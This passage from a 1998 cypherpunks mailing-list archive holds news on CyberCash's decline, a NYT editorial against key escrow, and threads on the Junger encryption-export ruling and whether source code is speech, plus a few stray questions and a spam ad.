 decline -- the latest to strike the company. Once
 trading in the $60 range, it fell steadily this week to
 finish at $11.12 1/2.

 The hard times come even as CyberCash has tried
 to tone down its aspirations and diversify into a
 more conventional business, the processing of
 credit-card transactions in ordinary stores. The
 moral, said Ulric Weil, a technology analyst at
 investment bank Friedman, Billings Ramsey Co. in
 Arlington, Va., is: ``It's always hard to bet on the
 purchasing mores of consumers.''

 William N. ``Bill'' Melton, one of Northern
 Virginia's most accomplished technology
 entrepreneurs, envisioned a world of paperless
 purchasing when he founded CyberCash in August
 1994. In this world, Internet users would purchase
 goods and services using new ``virtual currencies,''
 such as CyberCoin, a CyberCash product that
 allows online purchases of up to $20 at a time by
 transferring funds from a credit card or bank
 account to an account that CyberCash oversaw.

 Few people bought anything with this virtual
 currency at first, but the market was patient. In the
 speculative world of Internet stocks, the potential
 for this commerce seemed limitless, and
 CyberCash was an instant Wall Street hit.
 Company shares, first offered to the public for $17
 in February 1996, were trading at more than $60
 by that June.

 But today, investors are tired of waiting. The
 predicted rush to electronic currency remains a
 mere trickle and what little there is generally uses
 plain-old credit card transactions, not a fancy new
 currency. For now, consumers shopping online
 merely want to use something they know and trust
 for payment, the credit card, not an entirely new
 form of currency.

 After this week's layoff, which involved about 20
 positions in the Washington area, CyberCash has
 about 200 employees. It remains unprofitable,
 having reported a loss of $5.67 million on sales of
 $1.14 million in the January-March quarter.

 If life weren't uncertain enough in Reston,
 speculation was rampant this week among analysts
 who follow the company that its low stock price
 was making it a ripe takeover target. These
 predictions were fueled further by the company's
 announcement Tuesday that its board of directors
 had adopted a new shareholders rights, or
 ``poison pill,'' plan, which companies typically use
 to deter unwanted takeover bids.

 In this case, if an outside entity attempted to
 purchase a stake in CyberCash that exceeded 15
 percent, the company board could invoke the
 provision -- at which point CyberCash
 shareholders would win the right to purchase
 company shares at a greatly discounted price. For
 a potential buyer, this would make CyberCash far
 more expensive.

 Russ Stevenson, CyberCash's general counsel,
 said the new provision was not related to the
 company's recent struggles, and that the timing of
 its adoption was coincidental. In a statement,
 CyberCash said the poison pill did not come in
 response to an acquisition proposal.

 James J. Condon, the company's chief operations
 officer, would not comment on whether
 CyberCash was in discussions to be acquired,
 citing a company policy ``never to comment'' on
 potential acquisitions. Melton, CyberCash's
 president and chief executive, was traveling
 Thursday and could not be reached for comment.

 CyberCash's recent woes stem in part from its
 May acquisition of ICverify Inc., an Oakland,
 Calif., company that makes credit-card processing
 software. CyberCash, which purchased ICverify
 for $57 million in cash and stock, hoped to
 complement its own technology with ICverify's
 more conventional ``point of sale'' software, which
 helps retailers process credit card transactions in
 shops and other commercial establishments.

 Entering the ``point of sale'' market was a way for
 CyberCash to hedge its bets against the uncertain
 future of electronic commerce, analysts said. ``This
 gave (CyberCash) a piece of the physical point of
 payment, as well as the electronic point of
 payment,'' said Scott Smith, an Internet commerce
 analyst at Current Analysis Inc. in Sterling.

 With the addition of ICverify, Condon said,
 CyberCash could now offer a full package of
 payment software to potential customers. They
 could now provide, say, a clothing retailer, the
 tools to process both in-person credit card
 transactions as well as Internet credit card
 purchases.

 But the ICverify acquisition proved a difficult
 transition. In recent months, analysts said, some
 customers of both companies have frozen their
 accounts, saying they were unsure about which
 transaction software they would deploy in the
 future.

 ``The ICverify transaction resulted in customers
 taking a close look at what direction they wanted
 to go in,'' said Weil.

 Condon said he expects this to be a short-term
 problem. He said he has spoken to several
 customers who plan to continue their accounts
 shortly.

 People who follow CyberCash generally agree on
 two things: that if the company can hang on long
 enough for electronic payments to become a
 widespread phenomenon, it will be well positioned
 to cash in.

 They also say the company has a strong, tenacious
 management team in place, led by Melton. ``He is
 the rock the company is built on, and he's
 committed to the company's success,'' said Smith.
 ``I don't see anyone there who is ready to back
 down.''

 But in the end, Weil said, the future of CyberCash
 might rest with forces beyond its control. ``You
 can't change the psyche of consumers,'' he said.
 ``CyberCash doesn't have that kind of influence.''
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only.
-----------------------





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The Philodox Symposium on Digital Bearer Transaction Settlement
  July 23-24, 1998: <http://www.philodox.com/symposiuminfo.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Jul 1998 07:40:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NYT Hits GAK, Boosts GAKS
Message-ID: <199807061440.KAA21885@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, July 6, 1998, p. A10.

   Editorial

   Privacy in the Digital Age

   As more and more Americans communicate and do business
   electronically, the fear is spreading that information they
   transmit can be seized by hackers or criminals and used for
   illegal or unsavory purposes. Fortunately, the technology
   to thwart such invasions already exists. It is called
   encryption, or the encoding of digital information to
   secure its privacy. But the Federal Bureau of Investigation
   is trying hard to prevent the growing use of encryption,
   both in the United States and abroad, because of fears that
   the protective technology itself will get into the wrong
   hands. That shortsighted stand will undermine efforts to
   protect commercial transactions and may actually hamper law
   enforcement rather than help it.

   The Clinton Administration's current policies toward
   encryption have been largely dictated by the F.B.I. and the
   Justice Department. These two agencies now block encryption
   makers from exporting their most advanced technology unless
   they agree to develop a method allowing law enforcement
   agencies to gain access to it. The method favored by the
   F.B.I. is known as the key escrow, in which the key to
   cracking a code is kept with a third party that could hand
   it over quickly if law enforcement agencies demanded it.

   But the key escrow method poses tremendous threats to
   privacy. There is a danger that access to keys for the code
   could be abused by law enforcement agencies and others.
   Worse, the United States would be required to share key
   escrow information with law enforcement agencies of other
   countries, and giving access to private communications to
   countries with poor human rights records could lead to
   crackdowns on dissidents using encryption for their own
   communications.

   According to industry officials, the export controls are
   already backfiring. More and more foreign companies are
   supplying encryption technologies without key escrow
   arrangements, making it virtually impossible for the F.B.I.
   to eavesdrop and stealing business from American firms. The
   growing foreign role diminishes the ability of the F.B.I.
   to demand new safeguards or ways to penetrate the
   communications of criminals who use encryption.

   President Clinton might normally be more sympathetic to
   concerns over maintaining privacy in the digital world. But
   since Attorney General Janet Reno has protected Mr. Clinton
   from an independent counsel on campaign finance, the White
   House is said to be loath to oppose either her or Louis
   Freeh, the F.B.I. Director, on this issue.

   On Capitol Hill, the debate over encryption has created
   some unusual political alliances. Many conservative
   Republicans have stood with leaders of the high-tech
   industry to oppose any kind of ban on encryption within the
   United States and to support a loosening of export controls
   on encryption technology. It has been odd to see Trent
   Lott, the Senate majority leader, and Dick Armey, the House
   majority leader, stand with civil libertarians against the
   demands of the F.B.I. But the F.B.I. is not without
   influence. House Speaker Newt Gingrich, more friendly to
   the agency, has prevented a bill encouraging greater use of
   encryption from coming to a vote in the House.

   The concerns of law enforcement agencies are legitimate.
   But smart criminals are already using encryption, some of
   which is readily available on the Internet. That was the
   message conveyed only a few weeks ago by such unlikely
   allies as Bill Gates of Microsoft and Jim Barksdale of
   Netscape, who are on opposite sides in the Justice
   Department's antitrust lawsuit against Microsoft but agree
   on this issue.

   The F.B.I. should give up its losing fight against
   encryption and work with industry to develop new means to
   catch criminals who use it. One approach under discussion

   would be to develop software technology that could be
   surreptitiously placed in a suspect's computer to capture
   keystrokes before they are encrypted. Any such operation
   would have to be carried out under strict court control as
   the electronic equivalent of a search warrant. But law
   enforcement agencies have to find a legal and ethical way
   to stay ahead of technology, rather than stand in the way
   of it. Trying to block advances in the digital age is
   futile.

   [End]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Jul 1998 07:50:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Gov Access to Key Strokes
Message-ID: <199807061450.KAA11968@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Would any of the members of the NAS CRISIS panel know 
if keystroke surveillance one of the technologies proposed
for the FBI as an alternative to GAK? 

Could this technology to be covertly placed in all keyboards 
for activation say, by remote control, or via a program/device 
on the Internet?

Recall the various proposals for putting hardware encryption 
in keyboards, with the possibility of covert GAK.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 6 Jul 1998 10:27:36 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 6, 1998
Message-ID: <199807061726.MAA12238@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=============================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

WIRELESS IT '98, The Next Generation in Personal
Computing & Communications October 12-14,
Las Vegas, Nevada Call (202) 785-0081 for more information!

=============================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rlpowell@calum.csclub.uwaterloo.ca (Robin Lee Powell)
Date: Mon, 6 Jul 1998 09:59:17 -0700 (PDT)
To: unlisted-recipients:; (no To-header on input)
Subject: Code for Crypto for Work...
Message-ID: <19980706165904Z204413-2874+14@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


I need a crippleable cypher for work (i.e. one that can be done in 40-bit and
something-reasonable modes), and I'm thinking rc5 might be a good choice.
Anyone know where I could find source for this, or have other suggestions?
For the record, I and my company are in Canada.

-Robin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rlpowell@calum.csclub.uwaterloo.ca (Robin Lee Powell)
Date: Mon, 6 Jul 1998 10:01:28 -0700 (PDT)
To: unlisted-recipients:; (no To-header on input)
Subject: Nevermind... :-)
Message-ID: <19980706170121Z204409-2875+15@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


OK, I poked around some more and RC5 is an exceptionally sucky choice.  Anyone
know of any good variable-length algorithms?

-Robin
PS: Sorry for the pseudo-off-topic-ness.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "barBEARian" <jag.privat@home.se>
Date: Mon, 6 Jul 1998 07:07:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: easy remailing tool for MacIntosh ?
Message-ID: <19980706140648.19437.qmail@m2.findmail.com>
MIME-Version: 1.0
Content-Type: text/plain


does anybody know of any nice, easy and convenient tool for the MacOS platform to do this complicated set-up for a chain of anonymous remailers ?

TIA, Harley




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Mon, 6 Jul 1998 11:43:02 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Gov Access to Key Strokes
In-Reply-To: <199807061450.KAA11968@camel14.mindspring.com>
Message-ID: <19980706144246.A3940@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, Jul 06, 1998 at 10:46:27AM -0400, John Young wrote:

> 
> Could this technology to be covertly placed in all keyboards 
> for activation say, by remote control, or via a program/device 
> on the Internet?
> 
> Recall the various proposals for putting hardware encryption 
> in keyboards, with the possibility of covert GAK.

	John, I have on occasion mentioned on the net the possibility of
doing this via secret back doors in Microsoft OS kernels (W98/NT),
backdoors hidden by encrypted code (and that damn new WIPO treaty) that
would only be decrypted inside the CPU using a chip key not available to
the user.  Given passage of WIPO I fully expect such technology to
become common as a means of copyright protection with very severe
penalties for those who would chose to peek inside the "technological
means" or alter it in any way.  And once one has created this secret
space inside the core OS and protected it by draconian criminal laws, it
doesn't take much for someone to add a little extra feature in there
that logs and transmits back to Big Brother user keystrokes or keys used
with the encryption routines or other such privilaged and private user
information.  This could be added by the FBI or by Microsoft under
federal pressure (which they certainly are).   And interfering with or
disconnecting this nice little brother feature might well be considered
to be tampering with a "technological means" of copyright protection and
subject the user to 5 years in prison. Certainly public dissemination of
tools and information (such as code listings) that would allow access to
and alteration of this secret space would very likely result in criminal
prosecution, even if such legal action was not common for individual users.

	In fact, under WIPO it would already be illegal to just
disassemble and debug the relevant part of the OS to check to see if
there was code in there to log and report keystrokes even if it was not
encrypted or otherwise protected.  And no doubt at all but that the
rights enforcement software will be encrypted and otherwise protected
just to make sure that anyone tampering with it or even just examining
it for security flaws (such as keystroke recorders) would clearly be
flagrantly violating WIPO in an unambiguous as possible way.

	What this means is that due to well meaning anti piracy measures
carried to extremes - WIPO , it is likely to be impossible for a user of
standard shrink wrapped commercial software to legally vet that software
to  determine that it does not contain deliberate (courtesy the FBI)
means to grossly compromise the security of information on his computer
system.  He will have no legal recourse but to trust the provider of the
software, as even the analysis required to prove such a deliberate
security hole exists would be serious federal felonies...

	One wishes that Congress would see the light and allow 
circumvention of copyright protections for legitimate security analysis
and audits (and for any purpose which would be construed as fair use
under copyright law), but so far this hasn't happened.

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Jul 1998 12:08:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: fwd from spyking@thecodex.com
In-Reply-To: <35A111DE.9C6DDDBB@brainlink.com>
Message-ID: <199807061908.PAA07802@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Answering Spyking's questions Ray posted in reverse:

The Bronx incident started off as a major CB case,
with barricades and plastic suits galore, in accord
with the push for scare the beans out of the public
with imaginary terrorism (another WMD terrorism trial is 
due to start in NYC shortly).

It turns out that what was found were a couple of 
take-home, mildly radioactive elements (properly 
contained and marked) of a recently deceased 
employee of a plant that used them.  The story 
died quickly. NYT covered it twice, once hot,
once tepid.

Second, what's driving the nationwide push to train First
Responders and emergency room staff is Clinton's
funding the program with billions, after he read
Richard Preston's recent novel on biological
terrorism (so said news reports), and got a few 
heart-thumping briefings from if you only knew 
blackhearts.

Right now preparing for domestic defense against
Weapons of Mass Destruction is the hottest
career-jumpstart in the nation, and there's a frenzy of
competition passing as cooperation among the 
military, National Guards, intel, FBI, FEMA, state 
and local cops, EMS, sawbones, Red Cross,
CB weapons experts (US and RU), mercenaries, 
manufacturers, vets and revolving doorers of all the 
above, and, to be sure, the never-fake-it media 
goading and exaggerating (our straight-shooting 
members here excepted, well, except Y2Kites).

Like many state and local officials relishing the vital
national security role being porked to domestic forces,
neatly bypassing the military's limitations, NYC's mayor 
is happy as a pig in shit with his plan for a new $16m
anti-terrorist bunker on the 23rd floor of a buddy's office 
building across the street from the World Trade Center -- 
one RPG shot from the  23rd WTC into his impenetrable 
C4I nest. Rudy loves to watch "Patton" clad only in a 
Kevlar jockstrap.

Of course, he's a "former federal prosecutor," the most
common subtitle on TV of disembodied talking heads.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: b00kszz@hotmail.com
Date: Sun, 5 Jul 1998 23:43:06 -0700 (PDT)
To: b00kszz@hotmail.com
Subject: 750 How-To Books:UNDER $50.00750 How-To Books:UNDER $50.00
Message-ID: <199807060628.PAA22897@extra.caelum.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


We have over 750 high quality How-To Books & Reports 
that you can own, read, or even re-sell yourself.
PRICE: Under $50.00!!!

Popular Titles:
Government Auctions, How to Get a Patent, Stop Smoking,
Web Marketing, Business Start-ups, Legal Documents, Novels,
many "Making Money" titles  and more!

For many FREE PREVIEWS and other FREEBIES go here:

http://srsinfo.com/books.htm

VERY WELL WRITTEN, QUALITY INFORMATION!
RESALE RIGHTS INCLUDED.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkthomson <jkthomson@bigfoot.com>
Date: Mon, 6 Jul 1998 19:06:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Junger et al.
Message-ID: <3.0.3.32.19980706191157.006b9468@dowco.com>
MIME-Version: 1.0
Content-Type: text/plain



Reuters

3:40pm  6.Jul.98.PDT WASHINGTON -- A district court has dismissed a law
professor's challenge to US regulations strictly limiting the export of
computer data-scrambling technology.

Judge James Gwin ruled late Friday that the export limits, which prevented
Case Western Reserve University Law School professor Peter Junger from
posting the text of encryption programs on the Internet, did not violate
the constitutional right to free speech.

The Ohio court's ruling contradicts a California district court ruling last
August that said source code -- the instructions a person writes telling
the computer what actions to perform -- constitutes a form of speech
subject to First Amendment protection.

"Unlike instructions, a manual or a recipe, source code actually performs
the function it describes," Gwin wrote. "While a recipe provides
instructions to a cook, source code is a device, like embedded circuitry in
a telephone, that actually does the function of encryption."

Neither ruling gave speech protection to compiled code, a version of source
code converted into an actual software program that could be run on a
computer.

The US government appealed the California decision and the issue may
ultimately be decided by the Supreme Court.

Civil libertarians and high-tech companies had hoped the court would
overturn the export limits on encryption technology, which uses
mathematical formulas to scramble information and render it unreadable
without a password or software "key."

Once the realm of spies and generals, encryption has become an increasingly
critical means of protecting electronic commerce and global communications
over the Internet.

But law enforcement agencies, fearing encryption will be used by terrorists
and international criminals to hide their activities, have instituted
strict controls to limit the export of strong scrambling products.

Lawyers opposed to the export rules said the Ohio court misunderstood the
difference between source code and compiled code.

"The Ohio court clearly doesn't understand the communicative nature of
software," said Shari Steele, an attorney with the Electronic Frontier
Foundation. "It's true that software helps to perform functions, but it
does so by telling computers what to do.... It certainly is speech
deserving of the highest levels of First Amendment protection."



-----------------------------------------------------------------------
 james 'keith' thomson <jkthomson@bigfoot.com>  www.bigfoot.com/~ceildh
 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D [06.07.98]
 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9 [05.14.98]
 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of tnbnog BBS
-----------------------------------------------------------------------
Technology is introduced, utilized, depended upon, obsolete, 
standardized, and understood, in that order
=======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Mon, 6 Jul 1998 19:30:22 -0700 (PDT)
To: cryptography@c2.net>
Subject: RE: Junger et al.
Message-ID: <413AC08141DBD011A58000A0C924A6D52C359A@mvs2.teralogic-inc.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't understand ...

Did anyone demonstrate the "functionalness" of any arbitrary language
via a scanner and a compiler?

Why doesn't Gwin understand that the moment one successfully claims that
a specific class of source code is not speech by the virtue of the fact
that a compiler can transform it automatically into executable code
which performs a function, then ANY speech of ANY sort is fundamentally
vulnerable to being classified as functional as soon as a compiler can
transform it into real machine code.

So today, I can write the following:

1.	Find a container.
2.	Fill container with explosive substance.
3.	Move container to target location.
4.	Detonate container.

As soon as I have a compiler and a target machine that can execute these
instructions, suddenly this is not speech.  However, before this
compiler and machine combo exists, event the electronic form of this is
speech!

How could this be?

Ern

	-----Original Message-----
	From:	jkthomson [SMTP:jkthomson@bigfoot.com]
	Sent:	Monday, July 06, 1998 7:12 PM
	To:	cypherpunks@toad.com
	Subject:	Junger et al.



	Reuters

	3:40pm  6.Jul.98.PDT WASHINGTON -- A district court has
dismissed a law
	professor's challenge to US regulations strictly limiting the
export of
	computer data-scrambling technology.

	Judge James Gwin ruled late Friday that the export limits, which
prevented
	Case Western Reserve University Law School professor Peter
Junger from
	posting the text of encryption programs on the Internet, did not
violate
	the constitutional right to free speech.

	The Ohio court's ruling contradicts a California district court
ruling last
	August that said source code -- the instructions a person writes
telling
	the computer what actions to perform -- constitutes a form of
speech
	subject to First Amendment protection.

	"Unlike instructions, a manual or a recipe, source code actually
performs
	the function it describes," Gwin wrote. "While a recipe provides
	instructions to a cook, source code is a device, like embedded
circuitry in
	a telephone, that actually does the function of encryption."

	Neither ruling gave speech protection to compiled code, a
version of source
	code converted into an actual software program that could be run
on a
	computer.

	The US government appealed the California decision and the issue
may
	ultimately be decided by the Supreme Court.

	Civil libertarians and high-tech companies had hoped the court
would
	overturn the export limits on encryption technology, which uses
	mathematical formulas to scramble information and render it
unreadable
	without a password or software "key."

	Once the realm of spies and generals, encryption has become an
increasingly
	critical means of protecting electronic commerce and global
communications
	over the Internet.

	But law enforcement agencies, fearing encryption will be used by
terrorists
	and international criminals to hide their activities, have
instituted
	strict controls to limit the export of strong scrambling
products.

	Lawyers opposed to the export rules said the Ohio court
misunderstood the
	difference between source code and compiled code.

	"The Ohio court clearly doesn't understand the communicative
nature of
	software," said Shari Steele, an attorney with the Electronic
Frontier
	Foundation. "It's true that software helps to perform functions,
but it
	does so by telling computers what to do.... It certainly is
speech
	deserving of the highest levels of First Amendment protection."




-----------------------------------------------------------------------
	 james 'keith' thomson <jkthomson@bigfoot.com>
www.bigfoot.com/~ceildh
	 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196 122D
[06.07.98]
	 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4 6BC9
[05.14.98]
	 ICQ:746241 <keys> at pgp.mit.edu     ...and former sysop of
tnbnog BBS

-----------------------------------------------------------------------
	Technology is introduced, utilized, depended upon, obsolete, 
	standardized, and understood, in that order

=======================================================================_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Jul 1998 17:34:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Gov Secrecy Reform Act of 1998
Message-ID: <199807070034.UAA12735@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We've transcribed a fax of Senator Thompson's
Amendment as Substitute for S.712, "Government
Secrecy Reform Act of 1998," passed by the
Governmental Affairs Committee on June 17:

   http://jya.com/s712-amend.htm  (37K)

Here's a report on the amendment and vote:

NCC Washington Update, vol. 4, #25 July 1, 1998
[National Coordinating Committee for the Promotion of History]

Senate Committee Adopts Substitute Bill for
Moynihan's Government Secrecy Reform Act

Senate Committee Adopts Substitute Bill for Moynihan's Government
Secrecy Reform Act -- On June 17 the Senate Governmental Affairs Committee
met to consider a substitute bill for S.712, the Government Secrecy Reform
Act of 1998.  By voice vote, with no negative votes heard, the Committee
passed the substitute bill proposed by Senator Fred Thompson (R-TENN), the
chair of the Committee, and Senator Susan Collins (R-ME).  The original
bill had provided a framework for reform but had lacked the specifics
which this bill provides.

The substitute bill make four major changes from the bill that was
originally introduced.  First, this bill eliminates the section calling
for the establishment of a National Declassification Center in an existing
agency -- which many had thought could be the National Archives -- and
instead expands the functions and oversight responsibilities of the
existing Information Security Oversight Office (ISOO) and moves that
office from the National Archives to the Executive Office of the
President.  Second, the bill states that classified information must be
declassified after 25 years unless, as the bill summary states,
"extraordinary circumstances" require that it remain classified.  The
original bill had a 30 year time limit for most information to remain
classified.  Third, the substitute bill retains the balancing test of the
original bill; however, the revised bill establishes criteria to guide
agency classification decisions for weighing the concerns of national
security and the public interest in disclosure.  The national security
criteria are taken directly from President Clinton's E.O 12958 and the
public interest criteria are newly developed for the substitute bill.
Fourth, the substitute bill establishes a Classification and
Declassification Review Board composed of 5 public members to hear agency
and individual appeals regarding classification and declassification
decisions.

Once the report for the amended S. 712 is filed, which is expected to
happen in mid-July, then the substitute bill will be referred to the
Senate Select Committee on Intelligence for 30 days for their
consideration.  It is anticipated that the Intelligence Committee may hold
hearings and may have objections to the balancing test provision of the
bill.  Since there appears to be little attention in the House to this
legislation and since there are not many legislative days remaining before
adjournment, it is doubtful that this legislation will pass in the 105th
Congress.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "VICTOR HERRERA" <PELUCHE-10@worldnet.att.net>
Date: Mon, 6 Jul 1998 21:02:07 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <01bda95c$e2e22a00$1e83400c@edson>
MIME-Version: 1.0
Content-Type: text/plain




can u help me  thank 
u


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Mon, 6 Jul 1998 21:44:11 -0700 (PDT)
To: "'Ed Gerck'" <egerck@laser.cps.softex.br>
Subject: RE: Junger et al.
Message-ID: <413AC08141DBD011A58000A0C924A6D52C359C@mvs2.teralogic-inc.com>
MIME-Version: 1.0
Content-Type: text/plain


I think we are in violent agreement here ...

Except that it seems odd that speech is no longer 1st amendment
protected as soon as it can be interpreted by a machine to do something.
So, then, if I want to deny you first amendment protections for
something, I can simply write a compiler to turn your words into machine
executable code, and suddenly, your words are no longer protected
speech.  How could that be a reasonable interpretation of functional
versus not?

Secondly, Gwin said that encryption is a special class of software which
is MORE functional.  This is definitely a misunderstanding, to say the
least.  I don't see how any particular class of software is necessarily
more or less functional than other classes of software.  In the
functional sense, all software, when compiled and executed is
functional, period (whether it performs according to its original design
is irrelevant).

Ern

	-----Original Message-----
	From:	Ed Gerck [SMTP:egerck@laser.cps.softex.br]
	Sent:	Monday, July 06, 1998 9:09 PM
	To:	Ernest Hua
	Cc:	cypherpunks@toad.com; 'cryptography@c2.net'
	Subject:	RE: Junger et al.

	On Mon, 6 Jul 1998, Ernest Hua wrote:

	>So today, I can write the following:
	>
	>1.	Find a container.
	>2.	Fill container with explosive substance.
	>3.	Move container to target location.
	>4.	Detonate container.
	>
	>As soon as I have a compiler and a target machine that can
execute these
	>instructions, suddenly this is not speech.  However, before
this
	>compiler and machine combo exists, event the electronic form of
this is
	>speech!
	>
	>How could this be?

	Gwin has written a phrase which deserves more analysis, IMO --
free
	from political overtones if we want to be impartial. The phrase
can
	be reworded as:

	  "source code is a device, that actually does a function"

	The difference and importance here is between syntatic and
semantics. 

	Your 4-instruction source code above is not a device today -- it
	cannot perform any function. It has only syntatics, not the "how
to". 
	But, if there were a machine that could supply the proper
semantics
	(ie, actually perform the functions 1-4) then your source code
above
	would be a device.  Further, your source code may not be a
device
	today but be a device tomorrow.

	As another example, bringing together one pound of inert metal
with
	another one pound of the same inert metal was not considered to
be
	explosive -- until U235 was used for the inert metal and
properly
	compressed. The difference is semantic, not syntatic. 

	In that, Gwin is correct. Can the source code actually perform a
	function?  Then, it is a device. Irrespective of the needed
platform,
	in the same way that an electric shaver is a device irrespective
of
	the local availablity of an appropriate power outlet.

	IMO, even though I consider Gwin to be correct to a very large
	extent, widespread use of crypto will not come from lifiting
such
	bans ... but from real need -- which does not outweigh the
hassle,
	today. The EFF has a wrong target there. 

	Do you know how much Internet e-mail traffic is encrypted today?
Can
	you believe less than 10%? Notwithstanding the rethoric
exercises and
	limelight it may provide, talking about encryption export bans
may
	not be as effective as desigining better and easier uses of
strong
	crypto -- that can then really drive market, legislation and
courts. 

	Need to use is a better key than need to know, it seems.

	Cheers,

	Ed Gerck

	>
	>Ern
	>
	>	-----Original Message-----
	>	From:	jkthomson [SMTP:jkthomson@bigfoot.com]
	>	Sent:	Monday, July 06, 1998 7:12 PM
	>	To:	cypherpunks@toad.com
	>	Subject:	Junger et al.
	>
	>
	>
	>	Reuters
	>
	>	3:40pm  6.Jul.98.PDT WASHINGTON -- A district court has
	>dismissed a law
	>	professor's challenge to US regulations strictly
limiting the
	>export of
	>	computer data-scrambling technology.
	>
	>	Judge James Gwin ruled late Friday that the export
limits, which
	>prevented
	>	Case Western Reserve University Law School professor
Peter
	>Junger from
	>	posting the text of encryption programs on the Internet,
did not
	>violate
	>	the constitutional right to free speech.
	>
	>	The Ohio court's ruling contradicts a California
district court
	>ruling last
	>	August that said source code -- the instructions a
person writes
	>telling
	>	the computer what actions to perform -- constitutes a
form of
	>speech
	>	subject to First Amendment protection.
	>
	>	"Unlike instructions, a manual or a recipe, source code
actually
	>performs
	>	the function it describes," Gwin wrote. "While a recipe
provides
	>	instructions to a cook, source code is a device, like
embedded
	>circuitry in
	>	a telephone, that actually does the function of
encryption."
	>
	>	Neither ruling gave speech protection to compiled code,
a
	>version of source
	>	code converted into an actual software program that
could be run
	>on a
	>	computer.
	>
	>	The US government appealed the California decision and
the issue
	>may
	>	ultimately be decided by the Supreme Court.
	>
	>	Civil libertarians and high-tech companies had hoped the
court
	>would
	>	overturn the export limits on encryption technology,
which uses
	>	mathematical formulas to scramble information and render
it
	>unreadable
	>	without a password or software "key."
	>
	>	Once the realm of spies and generals, encryption has
become an
	>increasingly
	>	critical means of protecting electronic commerce and
global
	>communications
	>	over the Internet.
	>
	>	But law enforcement agencies, fearing encryption will be
used by
	>terrorists
	>	and international criminals to hide their activities,
have
	>instituted
	>	strict controls to limit the export of strong scrambling
	>products.
	>
	>	Lawyers opposed to the export rules said the Ohio court
	>misunderstood the
	>	difference between source code and compiled code.
	>
	>	"The Ohio court clearly doesn't understand the
communicative
	>nature of
	>	software," said Shari Steele, an attorney with the
Electronic
	>Frontier
	>	Foundation. "It's true that software helps to perform
functions,
	>but it
	>	does so by telling computers what to do.... It certainly
is
	>speech
	>	deserving of the highest levels of First Amendment
protection."
	>
	>
	>
	>

>-----------------------------------------------------------------------
	>	 james 'keith' thomson <jkthomson@bigfoot.com>
	>www.bigfoot.com/~ceildh
	>	 jkthomson:C181 991A 405C EAFB 2C46 79B5 B1DC DB78 8196
122D
	>[06.07.98]
	>	 ceildh   :1D79 59AF ED75 5945 6003 8240 DA34 ACCA 9DE4
6BC9
	>[05.14.98]
	>	 ICQ:746241 <keys> at pgp.mit.edu     ...and former
sysop of
	>tnbnog BBS
	>

>-----------------------------------------------------------------------
	>	Technology is introduced, utilized, depended upon,
obsolete, 
	>	standardized, and understood, in that order
	>

